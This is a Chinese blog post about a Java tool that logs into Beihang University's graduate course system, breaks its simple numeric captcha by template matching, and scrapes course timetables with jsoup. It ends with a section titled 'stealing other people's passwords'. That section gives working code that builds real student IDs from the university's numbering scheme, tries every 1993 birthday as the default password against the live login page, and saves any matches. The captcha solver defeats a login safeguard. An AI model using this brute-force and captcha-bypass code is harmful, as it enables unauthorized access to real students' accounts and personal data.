花了一天半时间将教务处上的课程表爬取下来,结果在今天晚上玩git时给误删了.真是蠢之极矣.北航教务处网站选课就是点击单选按钮,最后也不以课表的形式展示给人们.于是本系统通过模拟登录,访问网页,用jsoup解析网页上的课程,并以比较美观的形式进行展示.其中登录模块进行验证码破解,只需要输入用户名和密码,验证码自动输入,提交这个表单就登陆成功了.然而这份代码我已经删了,明天再把它还原吧.
于是余有叹焉,古人尝云,不要轻易使用rm指令除非你清楚的知道你正在做什么.当你疲惫时,一定不要从事危险动作.什么是危险动作?删除,修改等不可还原的写操作都是危险动作.我正在删除A,我以为会实现目标A,结果把B给删除了.误删不是做过一两次了,一定要吸取教训,慎慎重使用rm指令.
欧拉的著作在大火中焚烧大半,他尚且从头再来.我这一个微不足道的程序,凭记忆完全可以在半小时内完成.
=========下面对本项目进行详细陈述=======
一.项目依赖
dependencies { compile group: 'org.apache.httpcomponents', name: 'httpclient', version: '4.5.2' compile group: 'org.jsoup', name: 'jsoup', version: '1.9.2' }
使用httpclient进行网络请求,使用jsoup进行html解析
二.数据结构
//Course.java public class Course { String name; List<CourseClass>courseClassList; double score; } //CourseClass.java public class CourseClass { int week; int time; String address; Course course; }
课程Course和CourseClass是一对多关系,因为一门课可能有很多节课,每节课有各自的时间地点.所以Course包含一个courseClassList来存储上课时间和地点,为了让CourseClass获得Course的详情,CourseClass中有一个Course成员.这样一来就形成了一个指针回路,四通八达的感觉.在上面代码中省略了getters&setters.
三.登录北航研究生网站
public boolean login(String userId, String password, HttpClient client) throws IOException { //访问登录页面并破解验证码 String login = "http://gsmis.graduate.buaa.edu.cn/gsmis/main.do"; String img = "http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do"; HttpEntity entity=client.execute(new HttpGet(login)).getEntity(); EntityUtils.consume(entity); HttpEntity imgEntity = client.execute(new HttpGet(img)).getEntity(); String checkCode = new Decoder(imgEntity.getContent()).ans; EntityUtils.consume(imgEntity); //提交表单 String form = "http://gsmis.graduate.buaa.edu.cn/gsmis/indexAction.do"; HttpPost formPost = new HttpPost(form); List<NameValuePair> formList = new ArrayList<>(); formList.add(new BasicNameValuePair("id", userId)); formList.add(new BasicNameValuePair("password", password)); formList.add(new BasicNameValuePair("checkcode", checkCode)); formPost.setEntity(new UrlEncodedFormEntity(formList)); HttpEntity indexEntity = client.execute(formPost).getEntity(); String indexStr = EntityUtils.toString(indexEntity); //根据index页面内容判断是否登陆成功 int pos = indexStr.indexOf("当前用户"); return pos != -1; }
关于验证码破解在下文中讲解,这里重点说明网页的请求过程.
第一步,get方式访问登录页面,这一步的作用是告知服务器"我来了,给我一张验证码".于是服务器随机生成一个字符串s,把s放到session里面以备一会儿进行验证,然后服务器调用图片生成程序把s画到图片中.把图片链接link也放在session中,当我访问"http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do"连接时,服务器从session中取出link,把图片交给我.
所以,如果直接访问图片链接,每次访问到的图片都不一样,因为必须经过访问登录页面服务器把验证码s和图片链接link存到session中去.
技术上,对于任何一次请求,只要执行了就返回了HttpEntity,必须要把它消除掉,可以使用EntityUtil.consume(HttpEntity)方法.如果不消除掉,许多资源就不会得到释放.
第二步,get方式访问验证码链接.当访问图片连接时,服务器会查询session,获取图片的真正地址,将图片内容返给用户.
第三步,破解验证码之后,将用户,密码,验证码三个属性post到表单目标地址.这个过程,服务器会从session里面取出验证码字符串s判断一下是否正确,如果正确,再检验用户名密码是否配套.
四.访问选课页面
public List<CourseClass> getSyllabus(String userId, String password) throws IOException { login(userId, password, client); //先访问toModule并且必须消耗掉这个页面,否则无法访问必修课页面 String toModule = "http://gsmis.graduate.buaa.edu.cn/gsmis/toModule.do?prefix=/py&page=/pySelectCourses.do?do=xsXuanKe"; HttpResponse toModuleResp = client.execute(new HttpGet(toModule)); EntityUtils.consume(toModuleResp.getEntity()); //定义一个courseClassList用于存放课程,下面访问多个页面下的课程 List<CourseClass> courseClassList = new ArrayList<>(); //访问必修课页面并用jsoup进行解析 String bixiu = "http://gsmis.graduate.buaa.edu.cn/gsmis/py/pySelectCourses.do?do=xuanBiXiuKe"; HttpEntity bixiuEntity = client.execute(new HttpGet(bixiu)).getEntity(); String bixiuHtml = EntityUtils.toString(bixiuEntity); courseClassList.addAll(parse(bixiuHtml)); //访问实验类和专题类课程页面并用jsoup解析 String zhuanti = "http://gsmis.graduate.buaa.edu.cn/gsmis/py/pySylJsAction.do"; //实验类和专题类课程有如下三种,分别发起一次post请求 for (String zhuantiType : "001900 001700 000900".split(" ")) { List<NameValuePair> zhuantiForm = new ArrayList<>(); zhuantiForm.add(new BasicNameValuePair("sydl", zhuantiType)); HttpPost zhuantiPost = new HttpPost(zhuanti); zhuantiPost.setEntity(new UrlEncodedFormEntity(zhuantiForm)); HttpEntity zhuantiEntity = client.execute(zhuantiPost).getEntity(); String zhuantiHtml = EntityUtils.toString(zhuantiEntity); courseClassList.addAll(parse(zhuantiHtml)); } sortAndShow(courseClassList); return courseClassList; }
getSyllabus()函数接受用户名,密码参数,返回一个List<CourseClass>,表示课程列表.这个过程中用到jsoup解析页面.此函数位于SyllabusGetter.java中,SyllabusGetter有一个成员变量在这个函数中用到.
HttpClient client = HttpClients.createDefault();
五.解析页面
//解析html,返回已经选了的课的列表 List<CourseClass> parse(String html) { List<CourseClass> ans = new ArrayList<>(); List<Course> courses = new ArrayList<>(); Document doc = Jsoup.parse(html); for (Element i : doc.select("input[checked]")) { Element tr = i.parent().parent(); Elements tds = tr.select("td"); String timeAddresses[] = tds.get(1).text().split(" "); String name = tds.get(4).text(); String score = tds.get(7).text(); Course course = new Course(); course.setName(name.substring(0, name.indexOf("--"))); course.setScore(Double.parseDouble(score)); List<CourseClass> list = new ArrayList<>(); for (String timeAddress : timeAddresses) { if (timeAddress.length() == 0) continue; List<CourseClass> ll = parseTimeAddress(timeAddress); for (CourseClass cc : ll) { cc.setCourse(course); list.add(cc); } } course.setCourseClassList(list); courses.add(course); } for (Course i : courses) { for (CourseClass j : i.getCourseClassList()) ans.add(j); } return ans; } //因为有些课占用好多节课,所以应该返回一个List<CourseClass>而不是CourseClass List<CourseClass> parseTimeAddress(String s) { List<CourseClass> ans = new ArrayList<>(); String ss[] = s.split(","); int week = ss[0].charAt(1) - '0'; Matcher m = Pattern.compile("\d*~\d*").matcher(ss[0]); m.find(); String time[] = m.group().split("~"); int start = Integer.parseInt(time[0]), end = Integer.parseInt(time[1]); String address = ss[1].substring(5, ss[1].length() - 1); CourseClass courseClass = new CourseClass(); courseClass.setTime(start / 2 + 1); courseClass.setWeek(week); courseClass.setAddress(address); ans.add(courseClass); if (end - start == 3) { CourseClass courseClass1 = new CourseClass(); courseClass1.setTime(start / 2 + 2); courseClass1.setWeek(week); courseClass1.setAddress(address); ans.add(courseClass1); } return ans; } void sortAndShow(List<CourseClass> courseClassList) { courseClassList.sort(new Comparator<CourseClass>() { @Override public int compare(CourseClass o1, CourseClass o2) { return o1.getWeek() * 10 + o1.getTime() - o2.getWeek() * 10 - o2.getTime(); } }); courseClassList.forEach(i -> { System.out.printf("周%d第%d节在%s上%s ", i.getWeek(), i.getTime(), i.getAddress(), i.getCourse().getName()); }); }
解析页面纯粹就是字符串处理,多试几次很容易就解析成功了.
六.验证码破解
本项目中的验证码比东大教务处验证码还要简单,识别率高达百分之百.只有1-9共9个字符,并且也是像东大教务处那样端端正正.于是整个流程跟之前并无分别.
验证码图片为50*20的颜色矩阵.一张图片上有4个位置,比如"1111"这个验证码,4个1之间的间距始终为9,同理"2222","3333"...各个字符之间的距离也是9.所以只需要记取每个字符的位置和形状两个信息.
先得要下载一堆验证码图片,获取分析问题的原材料.
public class ImageDowloader { static HttpClient client= HttpClients.createDefault(); public static void main(String[] args) throws IOException { HttpGet get=new HttpGet("http://gsmis.graduate.buaa.edu.cn/gsmis/Image.do"); Path folder=Paths.get("src/main/resources/checkcodes"); if(Files.exists(folder)==false){ Files.createDirectory(folder); } for(int i=0;i<10;i++){ OutputStream cout= Files.newOutputStream(folder.resolve(i+".jpg")); client.execute(get).getEntity().writeTo(cout); cout.close(); } } }
其次,通过鼠标点击选取点集.生成data.txt
public class DataGenerator extends JFrame { public static void main(String[] args) { new DataGenerator(); } JTextField text = new JTextField(); JPanel panel = new JPanel() { @Override public void paint(Graphics g) { try { BufferedImage img = ImageIO.read(files[fileIndex]); if (chosen == null) chosen = new boolean[img.getWidth()][img.getHeight()]; for (int i = 0; i < img.getWidth(); i++) { for (int j = 0; j < img.getHeight(); j++) { if (chosen[i][j]) { img.setRGB(i, j, Color.RED.getRGB()); } } } g.drawImage(img, 0, 0, getWidth(), getHeight(), null); } catch (IOException e) { e.printStackTrace(); } } }; File[] files = new File("src/main/resources/checkcodes").listFiles(); int fileIndex = 0; int interval = 9; boolean chosen[][]; Map<Integer, List<Point>> ans = new HashMap<>(); DataGenerator() { ans=DataManager.load(); setExtendedState(JFrame.MAXIMIZED_BOTH); setLayout(new BorderLayout()); add(text, BorderLayout.NORTH); add(panel, BorderLayout.CENTER); setVisible(true); setDefaultCloseOperation(EXIT_ON_CLOSE); panel.addKeyListener(new KeyAdapter() { @Override public void keyPressed(KeyEvent e) { if (e.getKeyCode() == KeyEvent.VK_DOWN) { fileIndex = (fileIndex + 1) % files.length; chosen = null; panel.repaint(); } else if (e.getKeyCode() == KeyEvent.VK_UP) { fileIndex = (fileIndex - 1 + files.length) % files.length; chosen = null; panel.repaint(); } else if (e.isControlDown() && e.getKeyCode() == KeyEvent.VK_S) { DataManager.save(ans); } } }); text.addKeyListener(new KeyAdapter() { @Override public void keyPressed(KeyEvent e) { if (e.getKeyCode() == KeyEvent.VK_ENTER) { if (text.getText().length() != 1) return; int n = Integer.parseInt(text.getText()); List<Point> ps = new ArrayList<Point>(); for (int i = 0; i < chosen.length; i++) { for (int j = 0; j < chosen[0].length; j++) { if (chosen[i][j]) { if (ps.size() == 0) { ps.add(new Point(i, j)); } else { ps.add(new Point(i - ps.get(0).x, j - ps.get(0).y)); } } } } ans.put(n, ps); chosen=null; text.setText(""); panel.repaint(); } } }); panel.addMouseListener(new MouseAdapter() { @Override public void mouseClicked(MouseEvent e) { double gridW = panel.getWidth() * 1.0 / chosen.length, gridH = panel.getHeight() * 1.0 / chosen[0].length; int x = (int) (e.getX() / gridW), y = (int) (e.getY() / gridH); if (e.getButton() == 1) { chosen[x][y] = true; panel.repaint(); setTitle(x+" "+y); } else if (e.getButton() == 3) { chosen[x][y] = false; panel.repaint(); } } @Override public void mouseEntered(MouseEvent e) { panel.requestFocus(); } }); } }
生成的data.txt如下所示
1 6 8 1 -1 2 -2 3 -3 3 -2 3 -1 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 2 5 7 0 9 1 -1 1 8 1 9 2 -2 2 7 2 9 3 -2 3 6 3 9 4 -2 4 5 4 9 5 -2 5 -1 5 3 5 4 5 9 6 -1 6 0 6 1 6 2 6 3 6 9 3 5 6 0 1 0 8 1 -1 1 0 1 9 2 -1 2 4 2 10 3 -1 3 4 3 10 4 -1 4 0 4 3 4 4 4 10 5 0 5 1 5 2 5 5 5 9 6 6 6 7 6 8 4 4 12 0 1 1 -1 1 1 2 -3 2 -2 2 1 3 -4 3 -3 3 1 4 -5 4 1 5 -6 5 1 6 -7 6 -6 6 -5 6 -4 6 -3 6 -2 6 -1 6 0 6 1 6 2 6 3 6 4 7 1 5 5 8 0 1 0 2 0 6 1 -3 1 -2 1 -1 1 1 1 2 1 7 2 -3 2 1 2 8 3 -3 3 1 3 8 4 -3 4 1 4 8 5 -3 5 2 5 7 6 -3 6 3 6 4 6 5 6 6 6 5 7 0 1 0 2 0 3 0 4 0 5 0 6 0 7 1 -1 1 3 1 7 1 8 2 -2 2 2 2 9 3 -2 3 2 3 9 4 -2 4 2 4 9 5 -2 5 -1 5 3 5 8 6 -1 6 0 6 4 6 5 6 6 6 7 7 6 5 1 0 2 0 2 8 2 9 2 10 2 11 3 0 3 4 3 5 3 6 3 7 4 0 4 2 4 3 4 4 5 0 5 1 8 5 7 0 1 0 5 0 6 0 7 1 -1 1 2 1 4 1 8 2 -2 2 3 2 9 3 -2 3 3 3 9 4 -2 4 3 4 9 5 -2 5 -1 5 2 5 4 5 8 6 0 6 1 6 5 6 6 6 7 9 5 7 0 1 0 2 0 3 0 7 1 -1 1 4 1 8 2 -2 2 5 2 9 3 -2 3 5 3 9 4 -2 4 5 4 9 5 -1 5 4 5 8 6 0 6 1 6 2 6 3 6 4 6 5 6 6 6 7
第一个字符表示字符本身是啥,接下来两个数字表示字符在第一个位置时最左,最上点的坐标,接下来本行全部数字都是相对于最左最上点的相对坐标,也就是字符的形状.
在读写data.txt过程中,编写一个data.txt的"管家类",专门负责data.txt的读写操作
public class DataManager { static String filePath = "src/main/resources/data.txt"; public static void save(Map<Integer, List<Point>> ans) { try { PrintWriter cout = new PrintWriter(filePath); for (int i = 1; i < 10; i++) { if (ans.get(i) == null) continue; cout.print(i + " "); for (Point j : ans.get(i)) { cout.print(" " + j.x + " " + j.y); } cout.println(); } cout.close(); } catch (Exception e1) { e1.printStackTrace(); } } public static Map<Integer, List<Point>> load() { try { Map<Integer, List<Point>> ans = new HashMap<>(); Scanner cin = new Scanner(new File("src/main/resources/data.txt")); while (cin.hasNext()) { Scanner line = new Scanner(cin.nextLine()); int c = Integer.parseInt(line.next()); List<Point> list = new ArrayList<>(); while (line.hasNext()) { int x = Integer.parseInt(line.next()), y = Integer.parseInt(line.next()); list.add(new Point(x, y)); } ans.put(c, list); } return ans; } catch (Exception e) { e.printStackTrace(); } return null; } }
有了data.txt就可以通过模板匹配法框定一个点集,对这个点集对应的颜色集合求方差,方差越小说明颜色越相近.主要破解工作在Decoder.java中完成
class Color { double r, g, b; Color add(Color c) { return new Color(r + c.r, g + c.g, b + c.b); } Color(double d, double e, double f) { this.r = d; this.g = e; this.b = f; } Color(int x) { r = x & 255; g = (x >> 8) & 255; b = (x >> 16) & 255; } public Color mul() { return new Color(r * r, g * g, b * b); } public Color sub(Color m) { return new Color(r - m.r, g - m.g, b - m.b); } public Color div(int size) { return new Color(r / size, g / size, b / size); } public double len() { return Math.sqrt(r * r + g * g + b * b); } } public class Decoder { public String ans; int interval = 9; public Map<Integer, List<Point>> data; void load() { data = DataManager.load(); } String go(BufferedImage img) { String ans = ""; for (int i = 0; i < 4; i++) { int minC = 1; double minDx = Double.MAX_VALUE; for (int j = 1; j < 10; j++) { List<Point> s = data.get(j); Color m = new Color(0), n = new Color(0); for (int k = 1; k < s.size(); k++) { int x = s.get(k).x + s.get(0).x + i * interval, y = s.get(k).y + s.get(0).y; m = m.add(new Color(img.getRGB(x, y))); n = n.add(new Color(img.getRGB(x, y)).mul()); } n = n.div(s.size()); m = m.div(s.size()); double nowDx = n.sub(m.mul()).len(); if (nowDx < minDx) { minDx = nowDx; minC = j; } } ans += Integer.toString(minC); } return ans; } public Decoder() { load(); } public Decoder(InputStream cin) { this(); try { ans = go(ImageIO.read(cin)); } catch (IOException e) { e.printStackTrace(); } } //手动输入验证码 public Decoder(HttpEntity entity) { try { OutputStream cout = Files.newOutputStream(Paths.get("src/main/resources/checkcode.jpg")); entity.writeTo(cout); cout.close(); Scanner scanner = new Scanner(System.in); ans = scanner.next(); } catch (IOException e) { e.printStackTrace(); } } }
为了验证验证码的正确性,写一个可视化工具
public class DecodeFrame extends JFrame { public static void main(String[] args) { new DecodeFrame(); } File[]files=new File("src/main/resources/checkcodes").listFiles(); int fileIndex=0; JTextField text = new JTextField(); JPanel panel = new JPanel() { @Override public void paint(Graphics g) { try { BufferedImage img= ImageIO.read(files[fileIndex]); g.drawImage(img,0,0,panel.getWidth(),panel.getHeight(),null); setTitle(new Decoder().go(img)); } catch (IOException e) { e.printStackTrace(); } } }; DecodeFrame() { setExtendedState(MAXIMIZED_BOTH); setLayout(new BorderLayout()); add(text, BorderLayout.NORTH); add(panel, BorderLayout.CENTER); setVisible(true); setDefaultCloseOperation(EXIT_ON_CLOSE); text.addKeyListener(new KeyAdapter() { @Override public void keyPressed(KeyEvent e) { panel.repaint(); } }); panel.addKeyListener(new KeyAdapter() { @Override public void keyPressed(KeyEvent e) { if(e.getKeyCode()==KeyEvent.VK_DOWN){ fileIndex=(fileIndex+1)%files.length; panel.repaint(); }else if(e.getKeyCode()==KeyEvent.VK_UP){ fileIndex=(fileIndex-1+files.length)%files.length; panel.repaint(); } } }); panel.addMouseListener(new MouseAdapter() { @Override public void mouseEntered(MouseEvent e) { panel.requestFocus(); } }); } }
七.盗取别人密码
北航研究生选课网站密码一开始默认是生日,例如19930612这种形式.而北航的学号命名规则是SY1606604,SY表示学硕,16表示16级也就是年级,06表示院系,6表示6班,04表示班内学号.于是写一个循环程序挨个试探密码.下面程序把20个学生地密码试了一遍,其中密码集假设为1993年内365中密码.整个过程大概需要5-6分钟.
public class StealPassword { String prefix = "SY16066"; CloseableHttpClient client = HttpClients.createDefault(); public static void main(String[] args) throws IOException { new StealPassword(); } StealPassword() throws IOException { SyllabusGetter getter = new SyllabusGetter(); PrintWriter writer = new PrintWriter("user.txt"); for (int i = 1; i < 20; i++) { String userId = String.format("%s%02d", prefix, i); LocalDate date = LocalDate.of(1993, 1, 1); LocalDate end = LocalDate.of(1994, 1, 1); while (date.equals(end) == false) { String password = date.toString().replace("-", ""); date = date.plusDays(1); System.out.println(userId + " " + password); if (getter.login(userId, password, client)) { writer.println(userId + " " + password); break; } } } writer.close(); } }